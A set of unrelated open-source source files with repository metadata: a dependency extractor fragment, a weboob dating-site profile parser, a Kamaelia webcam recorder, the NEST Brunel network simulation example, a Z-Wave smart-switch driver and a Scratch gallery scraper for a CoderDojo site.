with open(to, 'r') as fin:
done_packages = set([line.split()[0] for line in fin])
except FileNotFoundError:
done_packages = set()
# initalising variables for progress bar
i = len(done_packages)
n = len(packages)
prev_percent_done = 0
for package in packages:
if package not in done_packages:
extract_package(package, to=to, client=client)
i += 1 # for progress bar
# progress bar
percent_done = round(i/n*100)
if percent_done > prev_percent_done:
print('{0}% done ({1} of {2})'.format(percent_done,i,n))
prev_percent_done = percent_done
| hdashnow/python-dependencies | dependencies.py | Python | mit | 5,312 | [
"VisIt"
] | c7170bef28fb2ecf9effe57226ce83138f9cf1e3df6d7af68dbcd66bdea16ef5 |
# -*- coding: utf-8 -*-
# Copyright(C) 2008-2011 Romain Bignon
#
# This file is part of a weboob module.
#
# This weboob module is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This weboob module is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this weboob module. If not, see <http://www.gnu.org/licenses/>.
try:
from HTMLParser import HTMLParser
except ImportError:
from html.parser import HTMLParser
import socket
from datetime import datetime
from dateutil.parser import parse as parse_dt
from collections import OrderedDict
from weboob.capabilities.contact import Contact as _Contact, ProfileNode
from weboob.tools.html import html2text
from weboob.tools.compat import unicode, basestring
class FieldBase(object):
def __init__(self, key, key2=None):
self.key = key
self.key2 = key2
def get_value(self, value, consts):
raise NotImplementedError()
class FieldStr(FieldBase):
def get_value(self, profile, consts):
return html2text(unicode(profile[self.key])).strip()
class FieldBool(FieldBase):
def get_value(self, profile, consts):
return bool(int(profile[self.key]))
class FieldDist(FieldBase):
def get_value(self, profile, consts):
return '%.2f km' % float(profile[self.key])
class FieldIP(FieldBase):
def get_hostname(self, s):
try:
return socket.gethostbyaddr(s)[0]
except (socket.gaierror, socket.herror):
return s
def get_value(self, profile, consts):
s = self.get_hostname(profile[self.key])
if profile[self.key] != profile[self.key2]:
s += ' (first %s)' % self.get_hostname(profile[self.key2])
return s
class FieldProfileURL(FieldBase):
def get_value(self, profile, consts):
id = int(profile[self.key])
if id > 0:
return 'http://www.adopteunmec.com/index.php/profile/%d' % id
else:
return ''
class FieldPopu(FieldBase):
def get_value(self, profile, consts):
return unicode(profile['popu'][self.key])
class FieldPopuRatio(FieldBase):
def get_value(self, profile, consts):
v1 = float(profile['popu'][self.key])
v2 = float(profile['popu'][self.key2])
if v2 == 0.0:
return 'NaN'
else:
return '%.2f' % (v1 / v2)
class FieldOld(FieldBase):
def get_value(self, profile, consts):
birthday = parse_dt(profile[self.key])
return int((datetime.now() - birthday).days / 365.25)
class FieldList(FieldBase):
def get_value(self, profile, consts):
return profile[self.key]
class FieldBMI(FieldBase):
def __init__(self, key, key2, fat=False):
FieldBase.__init__(self, key, key2)
self.fat = fat
def get_value(self, profile, consts):
height = int(profile[self.key])
weight = int(profile[self.key2])
if height == 0 or weight == 0:
return ''
bmi = (weight / float(pow(height / 100.0, 2)))
if not self.fat:
return bmi
elif bmi < 15.5:
return 'severely underweight'
elif bmi < 18.4:
return 'underweight'
elif bmi < 24.9:
return 'normal'
elif bmi < 30:
return 'overweight'
else:
return 'obese'
class FieldConst(FieldBase):
def get_value(self, profile, consts):
v = profile[self.key]
if isinstance(v, (basestring,int)):
try:
return consts[self.key][str(v)]
except KeyError:
return ''
elif isinstance(v, (tuple,list)):
labels = []
for i in v:
labels.append(consts[self.key][i])
return labels
class Contact(_Contact):
TABLE = OrderedDict((
('_info', OrderedDict((
('title', FieldStr('title')),
# ipaddr is not available anymore.
#('IPaddr', FieldIP('last_ip', 'first_ip')),
('admin', FieldBool('admin')),
('ban', FieldBool('isBan')),
('first', FieldStr('first_cnx')),
('godfather', FieldProfileURL('godfather')),
))),
('_stats', OrderedDict((
('mails', FieldPopu('mails')),
('charms', FieldPopu('charmes')),
('visites', FieldPopu('visites')),
('baskets', FieldPopu('panier')),
('invits', FieldPopu('invits')),
('bonus', FieldPopu('bonus')),
('score', FieldStr('points')),
('ratio', FieldPopuRatio('mails', 'charmes')),
('mailable', FieldBool('can_mail')),
))),
('details', OrderedDict((
#('old', FieldStr('age')),
('old', FieldOld('birthdate')),
('birthday', FieldStr('birthdate')),
('zipcode', FieldStr('zip')),
('location', FieldStr('city')),
('distance', FieldDist('dist')),
('country', FieldStr('country')),
('phone', FieldStr('phone')),
('eyes', FieldConst('eyes_color')),
('hair_color', FieldConst('hair_color')),
('hair_size', FieldConst('hair_size')),
('height', FieldConst('size')),
('weight', FieldConst('weight')),
('BMI', FieldBMI('size', 'weight')),
('fat', FieldBMI('size', 'weight', fat=True)),
('shape', FieldConst('shape')),
('origins', FieldConst('origins')),
('signs', FieldConst('features')),
('job', FieldStr('job')),
('style', FieldConst('styles')),
('food', FieldConst('diet')),
('favorite_food', FieldConst('favourite_food')),
('drink', FieldConst('alcohol')),
('smoke', FieldConst('tobacco')),
))),
('tastes', OrderedDict((
('hobbies', FieldStr('hobbies')),
('music', FieldList('music')),
('cinema', FieldList('cinema')),
('books', FieldList('books')),
('tv', FieldList('tvs')),
))),
('+sex', OrderedDict((
('underwear', FieldConst('underwear')),
('practices', FieldConst('sexgames')),
('favorite', FieldConst('arousing')),
('toys', FieldConst('sextoys')),
))),
('+personality', OrderedDict((
('snap', FieldStr('fall_for')),
('exciting', FieldStr('turned_on_by')),
('hate', FieldStr('cant_stand')),
('vices', FieldStr('vices')),
('assets', FieldStr('assets')),
('fantasies', FieldStr('fantasies')),
('is', FieldConst('character')),
))),
('-personality', OrderedDict((
('accessories', FieldConst('accessories')),
('skills', FieldConst('skills')),
('socios', FieldConst('socios')),
('family', FieldConst('family')),
('pets', FieldConst('pets')),
)))
))
def parse_profile(self, profile, consts):
if profile['online']:
self.status = Contact.STATUS_ONLINE
self.status_msg = u'online'
self.status_msg = u'since %s' % profile['last_cnx']
else:
self.status = Contact.STATUS_OFFLINE
self.status_msg = u'last connection %s' % profile['last_cnx']
self.summary = unicode(HTMLParser().unescape(profile.get('announce', '').strip()))
if len(profile.get('shopping_list', '')) > 0:
self.summary += u'\n\nLooking for:\n%s' % HTMLParser().unescape(profile['shopping_list'].strip())
for photo in profile['pics']:
self.set_photo(photo.split('/')[-1],
url=photo + '/full',
thumbnail_url=photo + '/small',
hidden=False)
self.profile = OrderedDict()
if 'sex' in profile:
for section, d in self.TABLE.items():
flags = ProfileNode.SECTION
if section.startswith('_'):
flags |= ProfileNode.HEAD
if (section.startswith('+') and int(profile['sex']) != 1) or \
(section.startswith('-') and int(profile['sex']) != 0):
continue
section = section.lstrip('_+-')
s = ProfileNode(section, section.capitalize(), OrderedDict(), flags=flags)
for key, builder in d.items():
try:
value = builder.get_value(profile, consts[int(profile['sex'])])
except KeyError:
pass
else:
s.value[key] = ProfileNode(key, key.capitalize().replace('_', ' '), value)
self.profile[section] = s
self._aum_profile = profile
| laurentb/weboob | modules/aum/contact.py | Python | lgpl-3.0 | 11,860 | [
"exciting"
] | cad69e175186897a6eed8fe3522325de7ffbd6774bc0766740f1b28672cb0d2b |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This import line is required to pull in pygame.camera support
#
import sys ;
sys.path.insert(0, "/home/zathras/Documents/pygame-1.9.0rc1/build/lib.linux-i686-2.5")
import time
import pygame
import pygame.camera
import Axon
import Image # PIL - Python Imaging Library
from Kamaelia.Chassis.Pipeline import Pipeline
from Kamaelia.Codec.Dirac import DiracEncoder, DiracDecoder
from Kamaelia.UI.Pygame.VideoOverlay import VideoOverlay
from Kamaelia.Video.PixFormatConversion import ToYUV420_planar
from Kamaelia.File.Writing import SimpleFileWriter
from Kamaelia.Util.PureTransformer import PureTransformer
pygame.init()
pygame.camera.init()
class VideoCapturePlayer(Axon.ThreadedComponent.threadedcomponent):
displaysize = (1024, 768)
capturesize = ( 640, 480 )
mirror = True
delay = 1/24.0
def __init__(self, **argd):
self.__dict__.update(**argd)
super(VideoCapturePlayer, self).__init__(**argd)
self.display = pygame.display.set_mode( self.displaysize )
self.camera = X=pygame.camera.Camera("/dev/video0", (352,288))
self.camera.start()
self.snapshot = None
def get_and_flip(self):
self.snapshot = None
self.snapshot = self.camera.get_image()
def main(self):
c = 0
tfr = 15.0
Itfr = int((tfr/2)+0.5)
tfrU = tfr + 0.05
tfrL = tfr - 0.05
d = 1/tfr
fudge = 0
ts = t = time.time()
while 1:
self.get_and_flip()
t2 = time.time()
dt = t2-t
d = 1/tfr
s = d - dt + fudge
if s<0:
s=0.0
time.sleep(s)
self.send((t2,self.snapshot), "outbox")
t = time.time()
c += 1
if (c % Itfr) ==0:
f= c/(t2-ts)
print "framerate", f,"cpu", dt, "target", d, "sleep",s
if f>tfrU:
fudge += 0.001
if f<tfrU:
fudge -= 0.001
Pipeline(
VideoCapturePlayer(),
PureTransformer(lambda (i,F) : {
"rgb" : pygame.image.tostring(F, "RGB"),
"size" : (352, 288),
"pixformat" : "RGB_interleaved",
}),
ToYUV420_planar(),
DiracEncoder(preset="CIF", encParams={"num_L1":0}),
SimpleFileWriter("X.drc"),
).run()
| sparkslabs/kamaelia | Sketches/MPS/VideoRecorder/VideoRecord.py | Python | apache-2.0 | 3,283 | [
"DIRAC"
] | 3d0a03726f8d421049b2f6e982f8ac520ef130a965c36c7f9ee9f5444bfb7cd8 |
# -*- coding: utf-8 -*-
#
# brunel_delta_nest.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
"""Random balanced network (delta synapses)
----------------------------------------------
This script simulates an excitatory and an inhibitory population on
the basis of the network used in [1]_
When connecting the network customary synapse models are used, which
allow for querying the number of created synapses. Using spike
detectors the average firing rates of the neurons in the populations
are established. The building as well as the simulation time of the
network are recorded.
References
~~~~~~~~~~~~~~
.. [1] Brunel N (2000). Dynamics of sparsely connected networks of excitatory and
inhibitory spiking neurons. Journal of Computational Neuroscience 8,
183-208.
"""
###############################################################################
# Import all necessary modules for simulation, analysis and plotting.
import time
import nest
import nest.raster_plot
import matplotlib.pyplot as plt
nest.ResetKernel()
###############################################################################
# Assigning the current time to a variable in order to determine the build
# time of the network.
startbuild = time.time()
###############################################################################
# Assigning the simulation parameters to variables.
dt = 0.1 # the resolution in ms
simtime = 1000.0 # Simulation time in ms
delay = 1.5 # synaptic delay in ms
###############################################################################
# Definition of the parameters crucial for asynchronous irregular firing of
# the neurons.
g = 5.0 # ratio inhibitory weight/excitatory weight
eta = 2.0 # external rate relative to threshold rate
epsilon = 0.1 # connection probability
###############################################################################
# Definition of the number of neurons in the network and the number of neuron
# recorded from
order = 2500
NE = 4 * order # number of excitatory neurons
NI = 1 * order # number of inhibitory neurons
N_neurons = NE + NI # number of neurons in total
N_rec = 50 # record from 50 neurons
###############################################################################
# Definition of connectivity parameter
CE = int(epsilon * NE) # number of excitatory synapses per neuron
CI = int(epsilon * NI) # number of inhibitory synapses per neuron
C_tot = int(CI + CE) # total number of synapses per neuron
###############################################################################
# Initialization of the parameters of the integrate and fire neuron and the
# synapses. The parameter of the neuron are stored in a dictionary.
tauMem = 20.0 # time constant of membrane potential in ms
theta = 20.0 # membrane threshold potential in mV
neuron_params = {"C_m": 1.0,
"tau_m": tauMem,
"t_ref": 2.0,
"E_L": 0.0,
"V_reset": 0.0,
"V_m": 0.0,
"V_th": theta}
J = 0.1 # postsynaptic amplitude in mV
J_ex = J # amplitude of excitatory postsynaptic potential
J_in = -g * J_ex # amplitude of inhibitory postsynaptic potential
###############################################################################
# Definition of threshold rate, which is the external rate needed to fix the
# membrane potential around its threshold, the external firing rate and the
# rate of the poisson generator which is multiplied by the in-degree CE and
# converted to Hz by multiplication by 1000.
nu_th = theta / (J * CE * tauMem)
nu_ex = eta * nu_th
p_rate = 1000.0 * nu_ex * CE
###############################################################################
# Configuration of the simulation kernel by the previously defined time
# resolution used in the simulation. Setting ``print_time`` to `True` prints the
# already processed simulation time as well as its percentage of the total
# simulation time.
nest.SetKernelStatus({"resolution": dt, "print_time": True,
"overwrite_files": True})
print("Building network")
###############################################################################
# Configuration of the model ``iaf_psc_delta`` and ``poisson_generator`` using
# ``SetDefaults``. This function expects the model to be the inserted as a
# string and the parameter to be specified in a dictionary. All instances of
# theses models created after this point will have the properties specified
# in the dictionary by default.
nest.SetDefaults("iaf_psc_delta", neuron_params)
nest.SetDefaults("poisson_generator", {"rate": p_rate})
###############################################################################
# Creation of the nodes using ``Create``. We store the returned handles in
# variables for later reference. Here the excitatory and inhibitory, as well
# as the poisson generator and two spike detectors. The spike detectors will
# later be used to record excitatory and inhibitory spikes.
nodes_ex = nest.Create("iaf_psc_delta", NE)
nodes_in = nest.Create("iaf_psc_delta", NI)
noise = nest.Create("poisson_generator")
espikes = nest.Create("spike_detector")
ispikes = nest.Create("spike_detector")
###############################################################################
# Configuration of the spike detectors recording excitatory and inhibitory
# spikes by sending parameter dictionaries to ``set``. Setting the property
# `record_to` to *"ascii"* ensures that the spikes will be recorded to a file,
# whose name starts with the string assigned to the property `label`.
espikes.set(label="brunel-py-ex", record_to="ascii")
ispikes.set(label="brunel-py-in", record_to="ascii")
print("Connecting devices")
###############################################################################
# Definition of a synapse using ``CopyModel``, which expects the model name of
# a pre-defined synapse, the name of the customary synapse and an optional
# parameter dictionary. The parameters defined in the dictionary will be the
# default parameter for the customary synapse. Here we define one synapse for
# the excitatory and one for the inhibitory connections giving the
# previously defined weights and equal delays.
nest.CopyModel("static_synapse", "excitatory",
{"weight": J_ex, "delay": delay})
nest.CopyModel("static_synapse", "inhibitory",
{"weight": J_in, "delay": delay})
###############################################################################
# Connecting the previously defined poisson generator to the excitatory and
# inhibitory neurons using the excitatory synapse. Since the poisson
# generator is connected to all neurons in the population the default rule
# (# ``all_to_all``) of ``Connect`` is used. The synaptic properties are inserted
# via ``syn_spec`` which expects a dictionary when defining multiple variables
# or a string when simply using a pre-defined synapse.
nest.Connect(noise, nodes_ex, syn_spec="excitatory")
nest.Connect(noise, nodes_in, syn_spec="excitatory")
###############################################################################
# Connecting the first ``N_rec`` nodes of the excitatory and inhibitory
# population to the associated spike detectors using excitatory synapses.
# Here the same shortcut for the specification of the synapse as defined
# above is used.
nest.Connect(nodes_ex[:N_rec], espikes, syn_spec="excitatory")
nest.Connect(nodes_in[:N_rec], ispikes, syn_spec="excitatory")
print("Connecting network")
print("Excitatory connections")
###############################################################################
# Connecting the excitatory population to all neurons using the pre-defined
# excitatory synapse. Beforehand, the connection parameter are defined in a
# dictionary. Here we use the connection rule ``fixed_indegree``,
# which requires the definition of the indegree. Since the synapse
# specification is reduced to assigning the pre-defined excitatory synapse it
# suffices to insert a string.
conn_params_ex = {'rule': 'fixed_indegree', 'indegree': CE}
nest.Connect(nodes_ex, nodes_ex + nodes_in, conn_params_ex, "excitatory")
print("Inhibitory connections")
###############################################################################
# Connecting the inhibitory population to all neurons using the pre-defined
# inhibitory synapse. The connection parameter as well as the synapse
# paramtere are defined analogously to the connection from the excitatory
# population defined above.
conn_params_in = {'rule': 'fixed_indegree', 'indegree': CI}
nest.Connect(nodes_in, nodes_ex + nodes_in, conn_params_in, "inhibitory")
###############################################################################
# Storage of the time point after the buildup of the network in a variable.
endbuild = time.time()
###############################################################################
# Simulation of the network.
print("Simulating")
nest.Simulate(simtime)
###############################################################################
# Storage of the time point after the simulation of the network in a variable.
endsimulate = time.time()
###############################################################################
# Reading out the total number of spikes received from the spike detector
# connected to the excitatory population and the inhibitory population.
events_ex = espikes.n_events
events_in = ispikes.n_events
###############################################################################
# Calculation of the average firing rate of the excitatory and the inhibitory
# neurons by dividing the total number of recorded spikes by the number of
# neurons recorded from and the simulation time. The multiplication by 1000.0
# converts the unit 1/ms to 1/s=Hz.
rate_ex = events_ex / simtime * 1000.0 / N_rec
rate_in = events_in / simtime * 1000.0 / N_rec
###############################################################################
# Reading out the number of connections established using the excitatory and
# inhibitory synapse model. The numbers are summed up resulting in the total
# number of synapses.
num_synapses = (nest.GetDefaults("excitatory")["num_connections"] +
nest.GetDefaults("inhibitory")["num_connections"])
###############################################################################
# Establishing the time it took to build and simulate the network by taking
# the difference of the pre-defined time variables.
build_time = endbuild - startbuild
sim_time = endsimulate - endbuild
###############################################################################
# Printing the network properties, firing rates and building times.
print("Brunel network simulation (Python)")
print("Number of neurons : {0}".format(N_neurons))
print("Number of synapses: {0}".format(num_synapses))
print(" Exitatory : {0}".format(int(CE * N_neurons) + N_neurons))
print(" Inhibitory : {0}".format(int(CI * N_neurons)))
print("Excitatory rate : %.2f Hz" % rate_ex)
print("Inhibitory rate : %.2f Hz" % rate_in)
print("Building time : %.2f s" % build_time)
print("Simulation time : %.2f s" % sim_time)
###############################################################################
# Plot a raster of the excitatory neurons and a histogram.
nest.raster_plot.from_device(espikes, hist=True)
plt.show()
| espenhgn/nest-simulator | pynest/examples/brunel_delta_nest.py | Python | gpl-2.0 | 12,068 | [
"NEURON"
] | 4ce930317ac307bce4fb23f8d4f52bc34c9052f5fc1f3b20c95121ac26caa8e3 |
from Firefly import logging
from Firefly.components.zwave.device_types.switch import ZwaveSwitch
from Firefly.const import ACTION_OFF, ACTION_ON, SWITCH
from Firefly.services.alexa.alexa_const import ALEXA_SMARTPLUG
TITLE = 'Aeotec Smart Switch 6'
BATTERY = 'battery'
ALARM = 'alarm'
POWER_METER = 'power_meter'
VOLTAGE_METER = 'voltage_meter'
CURRENT = 'power_current'
CURRENT_ENERGY_READING = 'current_energy_reading'
PREVIOUS_ENERGY_READING = 'previous_energy_reading'
VOLTAGE = 'voltage'
WATTS = 'watts'
COMMANDS = [ACTION_OFF, ACTION_ON]
REQUESTS = [SWITCH, CURRENT, VOLTAGE, WATTS]
INITIAL_VALUES = {}
CAPABILITIES = {
POWER_METER: True,
SWITCH: True,
}
def Setup(firefly, package, **kwargs):
logging.message('Entering %s setup' % TITLE)
switch = ZwaveAeotecSwitch6(firefly, package, **kwargs)
return firefly.install_component(switch)
class ZwaveAeotecSwitch6(ZwaveSwitch):
def __init__(self, firefly, package, **kwargs):
initial_values = INITIAL_VALUES
if kwargs.get('initial_values') is not None:
initial_values_updated = INITIAL_VALUES.copy()
initial_values_updated.update(kwargs.get('initial_values'))
initial_values = initial_values_updated
kwargs.update({
'initial_values': initial_values,
'commands': COMMANDS,
'requests': REQUESTS
})
super().__init__(firefly, package, TITLE, capabilities=CAPABILITIES, **kwargs)
self.set_alexa_categories(ALEXA_SMARTPLUG)
def update_device_config(self, **kwargs):
# TODO: Pull these out into config values
# TODO Copy this retry logic to all zwave devices
"""
Updated the devices to the desired config params. This will be useful to make new default devices configs.
For example when there is a gen6 multisensor I want it to always report every 5 minutes and timeout to be 30
seconds.
Args:
**kwargs ():
"""
# Spec Sheet
# TODO: Find spec sheet
# TODO: Document These
report = 2 # 1=hail 2=basic
successful = self.verify_set_zwave_params([
(110, 1),
(100, 1),
(80, report),
(102, 15),
(111, 30)
])
self._update_try_count += 1
self._config_updated = successful
| Firefly-Automation/Firefly | Firefly/components/zwave/aeotec/zw096_smart_switch_6.py | Python | apache-2.0 | 2,215 | [
"Firefly"
] | 404335b3b164d45c3aba92924918eabc328971cc2c586dfb3ed766854dc8914d |
import sys
if sys.version_info < (3,0):
from urllib import urlopen
fileHeader = "/user/schafer/web/outreach/dojo/"
else:
from urllib.request import urlopen
fileHeader = "../"
exclusionList = ["CVCoderDojo","jbschafer","uniscratch"]
approvalList = ["CVCoderDojo","jbschafer","uniscratch","crogersaea267"]
website = "http://www.cs.uni.edu/~schafer/outreach/dojo/"
#columnsVisible = 3
maxShown = 4
newCount = 10
#mode 0=all from files (For HTML development purposes)
#mode 1=update gallery list only (Only needed if new materials have been added to curriculum)
# This mode requires some additional manual intervention of
# gallery list file after the fact
#mode 2=update user submission lists only (Most common mode on website)
#mode 3=update both gallery and user submission lists
def generatePages(mode=0):
#Get Gallery List
if mode==1 or mode==3:
print("Updating Gallery List")
parseAllGalleries()
print("Do not forget to manually order and add instruction links")
print("Reading in Gallery List")
fin = open(fileHeader+"scripts/galleryIndex.txt","r")
galleries = []
lines = []
for line in fin:
if line.find("|")>-1:
toks = line.split("|")
if toks[1].find("Debug")==-1:
galleries.append(int(toks[0]))
lines.append(line)
fin.close()
print(str(len(galleries))+" galleries found")
#If necessary, scrape each gallery website again for user activity
if mode==2 or mode==3:
print("Updating submission lists for galleries ")
for gid in galleries:
galleryIDScrape(gid)
#Generate results tables
#createHTMLTables(galleries,lines)
createWIKITables(galleries,lines)
def createHTMLTables(galleries,lines):
from datetime import datetime
from datetime import timedelta
current=str(datetime.now())
tdelta = timedelta(days=newCount)
#Read through the gallery files to make a list of users present
allUsers = {}
users = []
for gid in galleries:
fin = open(fileHeader+"scripts/"+str(gid)+".txt","r")
for line in fin:
toks = line.split("|")
uid = toks[0]
pid = toks[1]
discovered = toks[2]
comments = toks[3]
if not uid in exclusionList:
#pid=pid[:-1]
if not uid in allUsers:
allUsers[uid]=[]
users.append(uid)
allUsers[uid].append((gid,pid,discovered,comments))
users = sorted(users, key=str.lower)
#determine how many levels/pages to create
levels = []
for item in lines:
gid,gname,ginst=item.split("|")
where = ginst.find(":")
level = ginst[:where]
if not level in levels:
levels.append(level)
levels = sorted(levels,key=str.lower)
for lev in levels:
#build single webpage
web = open(fileHeader+"scripts/projects_"+str(lev)+".html","w")
web.write("""<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>Cedar Valley CoderDojo</title>
</head>
<body>
<h1>CV CoderDojo Ninja Projects Level """)
web.write(str(lev[3:]))
web.write("</h1>\n")
web.write("""<p>Click on a link below to view projects from another level.
<ul>\n""")
for others in levels:
web.write('<li><a href="projects_'+str(others)+'.html">Level '+others[3:]+'</a></li>\n')
web.write("""</ul>
<p>Clicking on an icon in the table will take you to that Ninja's project.
<table border="2">
<tbody>
<tr>
<th scope="col"> </th>\n""")
for item in lines:
gid,gname,ginst=item.split("|")
if ginst.find(lev)>-1:
where = gname.find(" - ")
web.write(' <th scope="col">')
web.write(gname[where+3:]+'<p>\n')
web.write('<a href="'+website+'doku.php?id='+ginst+'/">')
web.write("Instructions")
web.write('</a><p>\n')
web.write('<a href="http://scratch.mit.edu/studios/'+gid+'/">')
web.write("Project Gallery")
web.write('</a>\n')
web.write("</tr>\n")
for uid in users:
web.write(" <tr>\n")
web.write(' <th align="left" scope="row">')
web.write('<a href="http://scratch.mit.edu/users/'+uid+'/">'+uid)
web.write('</a></th>\n')
for item in lines:
gid,gname,ginst=item.split("|")
#print(gid)
if ginst.find(lev)>-1:
count=0
web.write(" <td>")
for tup in allUsers[uid]:
if gid==str(tup[0]):
if count<maxShown:
web.write('<a href="http://scratch.mit.edu/projects/'+str(tup[1])+'/">')
if tup[3]=="COMMENTS\n":
exist="app"
else:
exist="unapp"
cur=datetime.strptime(current[:current.find(".")], '%Y-%m-%d %H:%M:%S')
older=datetime.strptime(tup[2][:tup[2].find(".")], '%Y-%m-%d %H:%M:%S')
diff = cur-older
if (diff>tdelta):
when="exist"
else:
when="new"
web.write('<img src="'+when+"_"+exist+'.png">')
web.write('</a>')
elif count==maxShown:
web.write(" plus more!")
count+=1
if count==0:
web.write('<img src="blank.png">')
web.write(' </td>\n')
web.write(" </tr>")
web.write(""" </tbody>
</table>
""")
web.write("<p>This table last updated: ")
current=str(datetime.now())
bp = current.find(".")
web.write(current[:bp])
web.write('<a href="scratchScrape.cgi">.</a>')
web.write("""</p>
<p> </p>
<p> </p>
</body>
</html>""")
web.close()
def createWIKITables(galleries,lines):
from datetime import datetime
from datetime import timedelta
current=str(datetime.now())
tdelta = timedelta(days=newCount)
#Read through the gallery files to make a list of users present
allUsers = {}
users = []
for gid in galleries:
fin = open(fileHeader+"scripts/"+str(gid)+".txt","r")
for line in fin:
toks = line.split("|")
uid = toks[0]
pid = toks[1]
discovered = toks[2]
comments = toks[3]
if not uid in exclusionList:
#pid=pid[:-1]
if not uid in allUsers:
allUsers[uid]=[]
users.append(uid)
allUsers[uid].append((gid,pid,discovered,comments))
users = sorted(users, key=str.lower)
#determine how many levels/pages to create
levels = []
for item in lines:
gid,gname,ginst=item.split("|")
where = ginst.find(":")
level = ginst[:where]
if not level in levels:
levels.append(level)
levels = sorted(levels,key=str.lower)
for lev in levels:
#build single webpage
web = open(fileHeader+"/data/pages/progress/projects_"+str(lev)+".txt","w")
web.write("""====== CV CoderDojo Ninja Projects Level """)
web.write(str(lev[3:]))
web.write(" ======\n")
web.write("""Click on a link below to view projects from another level.\n""")
for others in levels:
web.write(' * [[projects_'+str(others)+'|Level '+others[3:]+']]\n')
web.write("""\n\nClicking on an icon in the table will take you to that Ninja's project.
\n\n| ^""")
for item in lines:
gid,gname,ginst=item.split("|")
if ginst.find(lev)>-1:
where = gname.find(" - ")
web.write(gname[where+3:]) #Assignment Name
web.write(' [['+ginst[:-1]+'|Instructions]]') #Instruction Link
web.write(' [[http://scratch.mit.edu/studios/'+gid+'/|ProjectGallery]]') #GalleryLink
web.write(' ^')
web.write("\n")
for uid in users:
web.write('^ [[http://scratch.mit.edu/users/'+uid+'/|'+uid+']]')
for item in lines:
gid,gname,ginst=item.split("|")
if ginst.find(lev)>-1:
count=0
web.write(" | ")
for tup in allUsers[uid]:
if gid==str(tup[0]):
if count<maxShown:
if tup[3]=="COMMENTS\n":
exist="app"
else:
exist="unapp"
cur=datetime.strptime(current[:current.find(".")], '%Y-%m-%d %H:%M:%S')
older=datetime.strptime(tup[2][:tup[2].find(".")], '%Y-%m-%d %H:%M:%S')
diff = cur-older
if (diff>tdelta):
when="exist"
else:
when="new"
web.write('[[http://scratch.mit.edu/projects/'+str(tup[1])+'/|')
web.write('{{..:'+when+"_"+exist+'.png|}}]] ')
elif count==maxShown:
web.write(" plus more!")
count+=1
#if count==0:
#web.write('{{..:blank.png|}}')
web.write(" | \n")
web.write("This table last updated: ")
current=str(datetime.now())
bp = current.find(".")
web.write(current[:bp])
web.close()
#This gets run in mode 2 or 3. It is used to visit the Scratch website for the given studio
#And it rebuilds the local text file representing what projects are in the studio,
#if they are "new" or not, and if they have been commented on by dojo mentors.
def galleryIDScrape(studio):
from datetime import datetime
current=str(datetime.now())
fname = "scripts/"+str(studio)+".txt"
#begin by checking contents of existing studio file so that
#we don't waste time rechecking already checked in projects
import os.path
existing=[]
if os.path.isfile(fileHeader+fname):
fin = open(fileHeader+fname,"r")
for rec in fin:
existing.append(rec)
#Now update this data by checking to see if any of the non-approved projects
#are now approved
for index in range(len(existing)):
rec = existing[index]
if rec.find("AWAITING")>-1:
toks = rec.split("|")
if len(toks)!=4:
print("OOPS")
project = toks[1]
#print(project)
aResp = urlopen("http://scratch.mit.edu/site-api/comments/project/"+str(project))
webPg = str(aResp.read())
for admin in approvalList:
if webPg.find("users/"+admin)>-1:
toks[3]="COMMENTS\n"
existing[index]="|".join(toks)
#Check the Scratch gallery for new entries
aResp = urlopen("http://scratch.mit.edu/site-api/projects/in/"+str(studio)+"/1/")
webPg = str(aResp.read())
tokens = webPg.split('data-id="')
for v in tokens[1:]:
end = v.find('"')
pid = v[:end]
v2 = v.split("/users/")
end = v2[1].find("/")
uid = v2[1][:end]
found=False
for rec in existing:
if rec.find(pid)>-1 and rec.find(uid)>-1:
found=True
if not found:
line = uid+"|"+pid+"|"+str(current)+"|AWAITING\n"
existing.append(line)
#now rewrite the whole file
fout = open(fileHeader+fname,"w")
for line in existing:
fout.write(line)
fout.close()
def parseAllGalleries():
#This assumes that the galleryIndex exists and works
#in "updating" mode.
fin = open(fileHeader+"scripts/galleryIndex.txt","r")
existing = []
lines = []
for line in fin:
if line.find("|")>-1:
toks = line.split("|")
existing.append(int(toks[0]))
lines.append(line)
fin.close()
print("We already knew about "+str(len(existing))+" galleries.")
#Now see what is on the website
aResp = urlopen("http://scratch.mit.edu/site-api/galleries/owned_or_curated_by/CVCoderDojo/")
webPg = str(aResp.read())
gals = webPg.split("}}},")
print(str(len(gals))+" galleries located on scratch website")
if (len(existing)<len(gals)):
#This means there are new galleries to add to the list
print("That means we have to update the list")
#First, print the old part of the file in current order
fout = open(fileHeader+"galleryIndex.txt","w")
for x in lines:
fout.write(x)
#Now, find all of the current galleries not already in the file
newGals = []
for g in gals:
colon = g.find(":")
comma = g.find(",",colon)
sid = g[colon+2:comma]
titleTag = g.find('"title": "')
quote = g.find('"',titleTag+11)
title = g[titleTag+10:quote]
if (not (int(sid) in existing)):
newGals.append((sid,title))
print("Reality check. I found "+str(len(newGals))+" new galleries.")
newGals.sort()
for g in newGals:
sid,title=g
fout.write(sid+"|"+title+"\n")
fout.close()
else:
print("Current File was up to date")
generatePages(2)
